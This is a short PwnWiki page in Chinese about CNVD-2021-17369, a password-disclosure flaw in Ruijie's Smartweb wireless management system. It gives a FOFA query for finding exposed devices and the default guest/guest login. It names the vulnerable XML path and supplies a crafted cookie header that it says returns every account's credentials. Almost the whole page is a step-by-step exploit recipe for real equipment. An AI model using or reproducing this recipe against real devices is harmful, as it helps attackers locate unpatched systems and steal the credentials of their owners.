CNVD-2021-17369 锐捷Smartweb管理系统 密码信息泄露漏洞

From PwnWiki
Revision as of 15:04, 12 July 2021 by Xc1ym (talk | contribs) (Created page with "CNVD-2021-17369 锐捷Smartweb管理系统 密码信息泄露漏洞")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎English • ‎中文(中国大陆)‎ • ‎中文(台灣)‎

FOFA

title="无线smartWeb--登录页面"

默认guest密码

guest/guest


漏洞位置

http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml


漏洞利用

Cookice添加以下內容 

Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest


可以獲取所有賬戶信息


參考

https://mp.weixin.qq.com/s/EICYTqRWDRB8OfXKHxCBfQ

Retrieved from "https://pwnwiki.com/index.php?title=CNVD-2021-17369_銳捷Smartweb管理系統_密碼信息洩露漏洞/zh-cn&oldid=7029"